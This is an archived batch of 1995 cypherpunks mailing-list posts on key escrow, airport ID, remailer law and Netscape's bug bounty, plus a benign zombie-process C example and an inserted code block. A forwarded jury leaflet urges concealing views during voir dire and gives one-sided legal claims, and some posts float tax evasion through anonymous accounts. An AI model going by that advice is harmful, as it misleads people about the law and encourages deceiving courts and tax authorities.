Date: Sun, 15 Oct 95 13:32:03 PDT
To: nnnnnnnnJon Roland <ats-l@burn.ucsd.edu
Subject: called as juror (fwd)
Message-ID: <Pine.BSD/.3.91.950909080431.7657z-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain






             (Better Living Thru Better Living)                    
***************************************************************************
*        SNAIL ME             +      GABRIELLI'S  *ZINFANDEL*  (RED) &    *
*      YER ROSEHIPS           +                                           *
*  IF YOU LIKED THIS POST!    +     *ASCENZA*  (WHITE-BLEND)---YUMMY!     *
***************************************************************************
               [Ask Fer  *Gabrielli Wine*  at 
		yer local liquor store if'n ya
		want to tend yer rugosa]


	Let your voice be heard in the campaign to save the life of
	 		     Mumia Abu Jamal

               ++++ stop de execution of Mumia Abu-Jamal ++++
       ++++ if you agree copy these 3 sentences in your own sig ++++
     ++++ more info: http://www.xs4all.nl/tank/spg-l/sigaction.htm ++++


---------- Forwarded message ----------
Date: Sun, 3 Sep 95 17:50 EST
From: lindat@iquest.net
To: news@aen.org
Subject: called as juror

From: landers@AZStarNet.com (L. A. ANDERSON)


              IF YOU'RE CALLED FOR JURY SERVICE

Don't worry!  Be happy!  Look at jury service as an opportunity to "do good"
for yourself and others.  It's your chance to help the justice system
deliver justice, which is absolutely essential to a free society.

Also, you can do more "political good" as a juror than in practically any
other way as a citizen: your vote on the verdict is also a measure of public
opinion on the law itself--an opinion which our lawmakers are likely to take
seriously.  Short of being elected to office yourself, you may never
otherwise have a more powerful impact on the rules we live by than you will
as a trial juror.

However, unless you are fully informed of your powers as a juror, you may be
manipulated by the less powerful players in the courtroom into delivering
the verdict they want, instead of what justice would require.  That is why
this "kit" was written--to give you information that you're not likely to
receive from the attorneys, or even from the judge.

_ Justice may depend upon your being chosen to serve, so here are some
"words to the wise" about how to make it through voir dire, the jury
selection process: You may feel that answering some of the questions asked
of you would compromise your right to privacy.  If you refuse to answer
them, it will probably cost you your chance to serve.  Likewise, if you
"talk too much"--especially if you admit to knowing your rights and powers
as a juror, as explained below, or that you have qualms about the law itself
in the case at hand, or reveal that you're bright, educated, or are
interested in serving!  So, from voir dire to verdict, let your conscience
be your guide.
  
_ Nothing in the U.S. Constitution or in any Supreme Court decision requires
jurors to take an oath to follow the law as the judge explains it or, for
that matter, authorizes the judge to "instruct" the jury at all.  Judges
provide their interpretation of the law, but you may also do your own
thinking.  Keep in mind that no juror's oath is enforceable, and that you
may regard all "instructions" as advice.
                              
_ Understanding the full context in which an illegal act was committed is
essential to deciding whether the defendant acted rightly or wrongly.
Strict application of the law may produce a guilty verdict, but what about
justice?  If the jurors agree that, beyond a reasonable doubt, the accused
did act as charged, then "context becomes everything" in reaching a verdict
you can live with.  Credit or blame for the verdict will go to you, so be
sure to ask the judge how you can pose questions to witnesses, so that you
can learn the complete context, should the lawyers fail to bring it out. 

_ When they believe justice requires it, jurors can refuse to apply the law.
Jurors have the power to consider whether the law itself is wrong (including
whether it is "unconstitutional"), or is being applied for political
reasons.  Is the defendant being singled out as "an example" in order to
demonstrate government muscle?  Were the defendant's constitutional rights
violated during the arrest?  Much of today's "crime wave" consists of
victimless crimes--crimes against the state, or "political crimes", so if
you feel that a verdict of guilty would give the government too much power,
or help keep a bad law alive, just remember that you can refuse to apply any
law that violates your conscience.

_ Prosecutors often "multiply charges" so the jury will assume the defendant
"must be guilty of something".  But one of the great mistakes a jury can
make is to betray both truth and conscience by compromising.  If you believe
the defendant is not guilty of anything, then vote "not guilty" on all counts.

_ You can't be punished for voting according to your conscience.  Judges
(and other jurors) often pressure hold-out jurors into abandoning their true
feelings and voting with the majority "...to avoid the expense of a hung
jury and mistrial".  But you don't have to give in.  Why?  Because...

_ Hung juries are "OKAY".  If voting your conscience should lead to a hung
jury, not to worry, you're doing the responsible thing.  There is no
requirement that you must reach a verdict.  And the jury you hang may be
significant as one of a series of hung juries sending messages to the
legislature that the law you're working with has problems, and it's time for
a change.  If you want to reach consensus, however, one possible way is to
remind your fellow jurors that...

_ Jurors have the power to reduce charges against the defendant, provided
that "lesser included offenses" exist in law (ask the judge to list and
explain them, and the range of potential punishments that go with each).
Finding guilt at a lower level than charged can be appropriate in cases
where the defendant has indeed victimized someone, but not so seriously as
the original charges would indicate.  And, if it will be up to the judge to
decide the sentence, it's within the power of the jury to find the defendant
guilty of a reduced charge which will, at most, entail the amount of
punishment it thinks is appropriate. 

_ The Fully Informed Jury Association (FIJA) hopes the above information
helps you to find a verdict that you believe is conscientious and just, a
verdict which you can therefore be proud to discuss with friends, family,
legal professionals, the community or the media, should any of them want to
know what happened, how, and why.  If you have further questions, or want a
hard copy of this article and others contained in FIJA's "Jury Power
Information Kit", phone 1-800-TEL-JURY, and leave your name and address on
tape.  The office phone number for FIJA National HQ is 406-793-5550.  









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 14:27:18 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <199510152027.NAA23085@mycroft.rand.org>
Message-ID: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Jim Gillogly wrote:

> 
> > Michael Froomkin <froomkin@law.miami.edu> writes:
> > I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
> > a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
> > with fun questions I should throw at him should contact me...
> 
> > Please note that the ostensible topic of this discussion is *commercial*
> > key escrow, not Clipper per se, so I have to be diplomatic....
> 
> You might try addressing the areas of liability for escrow agents.  If
> private escrow agents can be sued for loss of information due to theft
> or other authorized or unauthorized release of keys, their liability could
> be horrendous, depending on the value of the compromised data. Gillogly
> Software certainly will not be a commercial keyholder!
> 
> 	Jim Gillogly
> 	24 Winterfilth S.R. 1995, 20:20
> 


You also might point out that commercial escrow is in a way MORE prone to 
compromise because it effectively doubles the number of entities entitled 
to demand release of the keys.

Instead of JUST government, you now have to face the possibility of key 
forfeiture by BOTH government and the commercial escrow agent, the escrow 
agent being, as it is, subject to the whim of governmental coercion to 
release keys as well as the agent's own reasons for doing so.

Effectively the potential for misuse is increased by virtue of the 
increased numbers of officials (commercial and public) who have access to 
the material.

I would like to hear the answer to this dilemma, which I am sure will 
include something about commercial key escrow easing the perceptions of 
the public, to which the obvious response will be, "Then this is a 
public relations move to avoid the perception of potential government abuse 
and a move which in fact increases the level of risk, is that right?"

Perhaps I should attend.  Where and when is this precisely?

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 14:31:19 PDT
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: airport security
In-Reply-To: <951014071611.44602170@mitlns.mit.edu>
Message-ID: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 14 Oct 1995, Bob Bruen, MIT Lab for Nuclear Science wrote:

> like. The US security changes are a recent response, starting after the
> World Trade Center bombing and being stepped up on a continuing basis.

They really started earlier this year with the Unabomber threat to bomb 
an LA airliner earlier this year.

The peculiar thing is that skyjackings and aircraft bombings are much 
rarer now than during the '70s.  This is just a control ploy by the 
Feds.  There's no credible increased threat.  They just want to slowly 
introduce an internal passport.

> Today you need a picture ID to board with your ticket. Tomorrow...? We have
> lived in relative safety compared to the rest of the world, but I think those
> days are over. 

I wonder how many have challenged this.  Since IDs are still not required 
in life, what will they do if you simply present yourself without one.  I 
don't see that ID has anything to do with attack threats in any case.  
Attackers are more likely to have ID than to not have ID.

I suppose they are trying to discourage people from buying tickets in 
false names so that the databanks can be more useful to the authorities.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 15 Oct 95 10:41:54 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: I am looking for a way to create a zombie process
In-Reply-To: <9510151556.AA26716@all.net>
Message-ID: <m0t4X3e-000DgnC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> Is there anyone who can give me a simple program or set of commands that
> creates a zombie process? Thanks in advance. 

Here, public domain.

#include <stdio.h>
#include <stdlib.h>	/* exit() */
#include <sys/wait.h>	/* wait() */
#include <unistd.h>	/* fork(), sleep() */

int
main()
{
    if (!fork()) {
	/* Child; die. */
	exit(0);
    } else {
	/* Child dies, is zombie for ten seconds. */
	sleep(10);
	/* Reap it. */
	wait(NULL);
	/* Now no zombie. */
	sleep(10);
	exit(0);
    }
}
-- 
Shields.
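
[Added example, not part of the original post: the same fork/exit/wait sequence, but checking the child's state programmatically instead of sleeping and watching ps. It assumes a Linux /proc filesystem; proc_state and zombie_lifecycle are names made up for this example.]

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Return the one-letter process state from /proc/<pid>/stat
 * ('R' running, 'S' sleeping, 'Z' zombie, ...), or 0 if the
 * entry does not exist.  Assumes Linux procfs.
 */
char proc_state(pid_t pid)
{
    char path[64], buf[512];
    char *p;
    size_t n;
    FILE *f;

    snprintf(path, sizeof path, "/proc/%ld/stat", (long)pid);
    f = fopen(path, "r");
    if (f == NULL)
        return 0;
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';

    /* Format is "pid (comm) state ...".  comm may itself contain
     * ')' characters, so the state is found after the LAST ')'. */
    p = strrchr(buf, ')');
    if (p == NULL || p[1] != ' ' || p[2] == '\0')
        return 0;
    return p[2];
}

/*
 * Fork a child that exits at once.  Store the child's state while
 * it is still unreaped in *before, and its state after the parent
 * has reaped it in *after.  Returns 0 on success, -1 on error.
 */
int zombie_lifecycle(char *before, char *after)
{
    siginfo_t info;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(0);               /* child: die immediately */

    /* WNOWAIT blocks until the child has exited but leaves it
     * unreaped, so there is no race and no need to sleep. */
    if (waitid(P_PID, (id_t)pid, &info, WEXITED | WNOWAIT) != 0)
        return -1;
    *before = proc_state(pid);  /* zombie: exited, not yet reaped */

    /* Reap it; the kernel now frees the process table entry. */
    if (waitpid(pid, NULL, 0) != pid)
        return -1;
    *after = proc_state(pid);   /* entry is gone */
    return 0;
}

int main(void)
{
    char before = 0, after = 0;

    if (zombie_lifecycle(&before, &after) != 0) {
        perror("zombie_lifecycle");
        return 1;
    }
    printf("before reap: %c\n", before ? before : '-');
    printf("after reap:  %c\n", after ? after : '-');
    return 0;
}
```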



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 14:49:41 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015174534.14647G-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



> You also might point out that commercial escrow is in a way MORE prone to 
> compromise because it effectively doubles the number of entities entitled 
> to demand release of the keys.

Actually, any publicly known escrow system opens your communications to 
any lawyer who gets a blanket discovery subpoena.  

These are very popular these days and often include third parties to any 
lawsuit.  Anyone who can convince a judge to issue an order...


DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Sun, 15 Oct 95 15:34:26 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510152232.SAA12387@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510141153.AA16412@all.net>,
Dr. Frederick B. Cohen <fc@all.net> wrote:
> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offering
> a tee shirt is downright offensive.

But (amusingly enough) they can get free testing services from this
aspiring student for free just by providing source code.  Hey, it's fun! :-)
I'm no expert, but you get what you pay for. <grin>

[Psst: anyone wanna offer source code to the security modules?]


I do think their ``bug bounty'' system is an improvement -- at least
they're showing some concern for security, and beginning to admit
that outside review of security-critical code is...well...critical.

Still, I do agree that they really oughta be employing true experts
to carefully evaluate their system, if they wanna claim anything about
its security.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIGMAyoZzwIn1bdtAQG98wF9Hr8lU8nXqP50MNwO2SNhsMUg5XhzfcWg
22Tsp8OkYV3F22gUcI6Un1w7peK7ciT5
=hs1A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 15:34:03 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: airport security
In-Reply-To: <Pine.SUN.3.91.951015172125.14647F-100000@panix.com>
Message-ID: <Pine.3.89.9510151831.E61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Duncan Frissell wrote:

> I suppose they are trying to discourage people from buying tickets in 
> false names so that the databanks can be more useful to the authorities.
> 
You mean to the list marketing companies and the credit rating agencies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 15 Oct 95 15:36:39 PDT
To: cypherpunks@toad.com
Subject: Re: My chat with Goeff Greiveldinger
Message-ID: <199510152234.SAA12406@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510152027.NAA23085@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:

> You might try addressing the areas of liability for escrow agents.  If
> private escrow agents can be sued for loss of information due to theft
> or other authorized or unauthorized release of keys, their liability could
> be horrendous, depending on the value of the compromised data.

The problem of liability should be manageable. There are commercial data
storage firms (microfilm, etc.) that not only have access to the key for
your data, but to the data itself. Still, liability lawsuits have not
driven them out of business. I therefore believe that liability issues will
not pose a significant obstacle to commercial key escrow.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIGMiCoZzwIn1bdtAQHiJQGAlFhXEVKkf329xCbpWHHXYRkMNJUpbdDZ
nrEKcYvu9SVt/wlPLSq97sWukyQPxth0
=c5Wl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 15 Oct 95 15:50:48 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <v02120d04aca6d3c97f34@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



>PA Senate Bill 655 was signed into law on June 13, 1995, and it does
>appear to make non-logged anonymous remailers illegal.

This is rich!  The PA legislature just set themselves up for an anonymous
e-mail shit-storm from people using *foreign* non-logging remailers to
prove their point. Hold on to your shorts, you guys at hacktic, et al.,
you're gonna have some fun now...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 15:56:45 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   All praise to Jeff and his fellow programmers for sharing
   the struggle to come up with stronger crypto, but, no praise
   at all to Netscape's front office guys bullshitting the
   stock holders and speculators. Check the press releases and
   the speeches to customers and investors.

   Scott McNealy shocked an audience into silence at a recent
   plush meeting of high-tech reps with investors by asking,
   "Anybody telling the truth here?" Then applause broke out for
   his shrewd beat-em-to-the-punch candor to offset the
   pervasive cynicism of oft-burned high-tech investors.

   Big bucks are not made by hard-working programmers but by
   the marketeers of NASDAQ and NYSE smoke and mirrors used to
   lure multitudes of unsavvy investors and Internet
   merchandisers.

   Netscape's leaders are protecting its major stockholding
   coldhearts, just like Microsoft, Intel, Motorola, AT&T,
   and the rest do, or they die in the financial fuck-the-
   public sharkpool. They couldn't care less about the bottom-
   of-the-ladder techies who do the grunge work, take the
   blame for programming mistakes produced under
   horrendous marketing deadlines, and then are left to
   commiserate with each other and gnaw knuckles.

   That's the joy and sorrow of this reading list, the ancient
   story, talented people working their asses off for sons of
   bitches who think employees are contemptible, disposable or
   bribeable for cheap change and backpats -- and easily
   replaceable on shore or off. Jeff's not alone in this bind.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 16:01:47 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015151343.25547F-100000@crl.crl.com>
Message-ID: <Pine.3.89.9510151808.F61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Sandy Sandfort wrote:

> cigarettes.  Since even in the lowest tax European countries
> taxes make up 70% of the retail price of cigarettes, there is
> huge incentive to smuggle in US smokes.  Makes me proud to be
> an American.

Canada had exactly the same tax and had to eliminate it two years ago
after massive smuggling (supposedly in large part through native
reserves that straddle the border). The cigarette companies were actively
(I won't say alleged, it was definite) involved in the process, as they
exported their goods to a non-existent US market and let the packs sit
in cargo trailers to be picked up. 

Needless to say, there was no tax on exports. The previous gov had 
imposed one but had to drop it after massive cig. co lobbying alleging 
that Americans (who never even received the Canadian cigs) would switch 
to their own brands and jobs would be lost.

Cigarettes are a rather large industry and at the time were basically
operating a black market. One wonders how much easier this will become
once someone gets around to setting up a hard credible anon payment scheme.
The corporate willingness is certainly there. And I really don't see the 
securities industry (specifically currency markets) sticking around
once some competitive and sufficiently anon alternatives to the SEC go online
and offshore. Some sort of market regs enforcement is essential though,
you'll never have enough investor confidence for economically significant
blacknet exchanges otherwise. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 16:10:05 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015171748.22497A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9510151747.D61174-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> Effectively the potential for misuse is increased by virtue of the 
> increased numbers of officials (commercial and public) who have access to 
> the material.

Does he mean mandatory commercial key escrow (as in clipper keys held
by credit agencies?) Or something totally voluntary but standardized
by the gov? 

*Rant mode on*

I've heard cracking into Equifax and TRW is considered a rite of passage in 
the phreaker crowd. The security would have to be *damn* tight (as in forget 
it) for it to be trustworthy. And since it would probably be the big three
credit rating agencies (I forget the other one), their track record is not 
reassuring. I don't see these people securely using crypto throughout the 
entire org (in such a large org) in the future if they don't already.

Seeing my key sold to Son of Blacknet(LD) by Sons of Mitnick is not 
reassuring.

For that matter, what sort of databases would they consider holding this on?
And how easy would it be for the general public to get access to their key,
to verify for accuracy and revoke compromised keys. (big prob with the 
credit rating agencies) Who would be allowed (if anyone) or mandated 
(depending on which scheme) to certify the security? If NSA is 
mentioned, one might also point out the job Matt Blaze did on their 
Clipper. Bad production values don't make for good public security. 
 
Of course it all depends on exactly why they really want the escrow anyway.
If people will encrypt a second time with tomorrow's pgp, why should anyone
care? 

All you'd single encrypt for would be your income tax and the 
financial records you're already required by law to keep (I'm sure I've
misunderstood this. Can't be so useless.). I know that's not a particularly
diplomatic carry-over from the debated-to-death clipper thing, but really,
except as PR, why DO they still take this seriously? (unless you want to 
be paranoid about a ban, hmm, nevermind, debated-to-death)

Speaking of organizational crypto, anyone know what the scheme used in
Notes is? I know there's RSA... This seems rather more useful to examine
than MS's browser, considering corporations are making it a standard for 
groupwork. All you'd get on a browser would be credit no's and maybe e-mail.
Notes nets might carry the entirety of a company's docs and work in progress.
They do export it, right? Weakened foreign version or one 40 bit key version
for everyone? How about novell netware?

(Yeah, I do realize most folks don't have it, neither do I. A free client 
would be very nice, Mr. Gerstner, for everyone.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "& E. Metzger" <perry@piermont.com>
Date: Sun, 15 Oct 95 16:10:42 PDT
To: cypherpunks@toad.com
Subject: Netscape bugs bounty
Message-ID: <199510152310.TAA29098@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I am among the first people to be sarcastic about things Netscape has
done (I believe I originated the joke about the extra money from the
Netscape IPO being used to build a structure large enough to house
Marc Andreessen's ego), but I think this sniping about the Bugs Bounty
is silly. They are finally starting to try to do the right thing and
take problems, especially security problems, with their software
seriously and not sweep them under the rug. Cut them some slack. It
might not be perfect, but they are moving in a good direction.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 15 Oct 95 16:18:55 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951015191716.20081A@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, John Young wrote:

>    All praise to Jeff and his fellow programmers for sharing
>    the struggle to come up with stronger crypto, but, no praise
>    at all to Netscape's front office guys bullshitting the
>    stock holders and speculators. Check the press releases and
>    the speeches to customers and investors.

I think it will be interesting to see if Netscape will ever sell enough 
product to make a profit...however, they seem to be an excellent charity 
so far, making the WWW a very popular place.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 15 Oct 95 19:33:27 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510160213.WAA07796@thor.cs.umass.edu>
Message-ID: <199510160228.TAA17962@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I've sent mail to John Gilmore asking him if the EFF might
want to take part in suing the state over this thing. We'll see, I
guess.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@replay.com (Nobody in particular)
Date: Sun, 15 Oct 95 19:31:47 PDT
To: hackmsoft@c2.org
Subject: Illegally canceled articles on Microsoft Security Bugs
In-Reply-To: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
Message-ID: <199510160231.TAA10813@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


(A copy of this message has also been posted to the following newsgroups:
alt.security,
comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc,alt.religion.scientology,news.admin.net-abuse.misc,comp.protocols.smb,comp.os.ms-windows.advicacy,comp.os.ms-windows.networking.tcp-ip)

-----BEGIN PGP SIGNED MESSAGE-----

Could somebody please tell me who illegally canceled my article
<llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>, referenced
in the followup article below, as well as several other articles
I posted this morning? It was cross-posted to several groups, but
I don't think it should have triggered any spam-cancelers, and
I see nothing in news.admin.net-abuse.misc. I'd find the culprit
myself, but Stanford only saves the last 100 or so messages in
control. See the rather prominent blinking link on the Web page
below for the other PGP-signed article that was canceled.

Thanks in advance. Followups set to news.admin.net-abuse.misc.

Don't bother canceling this article, my friend. By the way, the
other articles were saved and emailed as well.

- -rich
 jabba@deathstar.stanford.edu and other accounts
 moderator of a certain list
 http://rescomp.stanford.edu/~llurch/innocuous/faq.html
 PGP key available on MIT server and via finger

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIHC9oND7LjhcPQ9AQHTZgQAxGQZGTFDrzUTfyWCuLTUP2VbIp6IwK/Y
NJjy7ke4rgZH+bjegb1h2ig/lALEhnX4+uhurhDJ0wq6du2p5V/DUlsNHCcWvotL
GHyd/ZLzXGq6OYRoPijUHAdDBPD2wWIdAfsYNiTgv3iezBJL+2cCq/YLiPd22KyF
MROQwF05Hoc=
=1K2B
-----END PGP SIGNATURE-----

I will be charitable and assume that it was someone else I've pissed off
(lord knows there's several), and not someone working directly for
Microsoft or the Church [spit] of Scientology, who were both maligned in
the canceled posts.

In article <petrichDGID4I.5GG@netcom.com>, petrich@netcom.com (Loren
Petrich) wrote:
> Newsgroups:
> alt.security,comp.os.ms-windows.apps.misc,comp.os.ms-windows.win95.misc
> Path:
> nntp.Stanford.EDU!news.Stanford.EDU!agate!howland.reston.ans.net!newsfeed.internetmci.com!news.sprintlink.net!noc.netcom.net!netcom.com!petrich
> From: petrich@netcom.com (Loren Petrich)
> Subject: Re: More Microsoft Security Bugs
> Message-ID: <petrichDGID4I.5GG@netcom.com>
> Organization: NETCOM On-line Communication Services (408 261-4700 guest)
> References: <llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>
> Date: Sun, 15 Oct 1995 21:02:42 GMT
> X-Original-Newsgroups:
> comp.os.ms-windows.win95.misc,alt.security,comp.os.ms-windows.apps.financial,comp.os.ms-windows.apps.utilities,comp.os.ms-windows.apps.word-proc,comp.os.ms-windows.apps.misc,alt.fan.bill-gates,comp.os.ms-windows.advocacy,alt.destroy.microsoft,comp.os.ms-windows.nt.admin.misc
> Lines: 9
> Sender: petrich@netcom2.netcom.com
> Xref: nntp.Stanford.EDU alt.security:21764
> comp.os.ms-windows.apps.misc:13757 comp.os.ms-windows.win95.misc:38436
>         My favorite example of such a bug is in BOB's password protection.
> If you mistype it 3 times, it will ask if you want another one. The only
> defender of this "feature" has been -- get this -- JoanieDearest (at 
> least if memory serves me correctly).
> -- 
> Loren Petrich                           Happiness is a fast Macintosh
> petrich@netcom.com                      And a fast train
> Visit my ftp site; its address is (in WWW syntax):
> ftp://ftp.netcom.com/pub/pe/petrich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 19:15:49 PDT
To: cypherpunks@toad.com
Subject: Re: My chat with  Goeff Greiveldinger
Message-ID: <aca70b991b0210041885@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:00 PM 10/15/95, Michael Froomkin wrote:
>I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at
>a discussion of commercial key escrow next Thursday in Bethesda.  Anyone
>with fun questions I should throw at him should contact me...
>
>Please note that the ostensible topic of this discussion is *commercial*
>key escrow, not Clipper per se, so I have to be diplomatic....

The question I have is this: Why is the Justice Department even involved at
all if it is truly only about _commercial_ key escrow?

(I have some speculations, of course, which I'll share in a minute.)

While commercial key escrow of course has legal implications, so do a lot
of things that I suspect the Justice Department has no interest in
discussing with anyone. And most of the implications of commercial key
escrow--if strongly voluntary in the sense we have discussed many times
here--are implications of _contract_ law that will get hashed out through
court cases.

So, why is the JD interested? Why would Mr. Greiveldinger of the JD be at a
discussion of commercial key escrow if in fact it is to be purely voluntary
and strongly voluntary?

Unless, of course, the JD has interests that go beyond mere privately
arranged contracts to hold keys in safety.

Or, I suppose, export control issues. (But then I think it unlikely that a
strongly voluntary system would be allowed to be exported. And since a
domestic version that is strongly voluntary would leak out almost
immediately, I think a domestic strongly voluntary CKE system is unlikely.)

I suspect Michael Froomkin can tell us why the JD is involved, what the
stated reason is, but I still find it "odd" that a purely voluntary
contractual arrangement between, say, "Thomas Paine" and "Ye Olde Keye
Repository" is generating interest by King George's legal officers.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 16:37:30 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015191827.6604A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> Were I an overseas employer, I would be quite happy to work in a 
> "disinterested" jurisdiction and hire American workers to telecommute and 
> issue their pay blindly to the number only or crypto bank account of their 
> choice and promptly encrypt or lose the records.

Thanks for responding, Black (if I may call you Black), it means I don't 
have to.  

> Remember, there is an incentive for employERS as well as employees to 
> flee the tax system of a nation that is manipulative of it.  Employers 

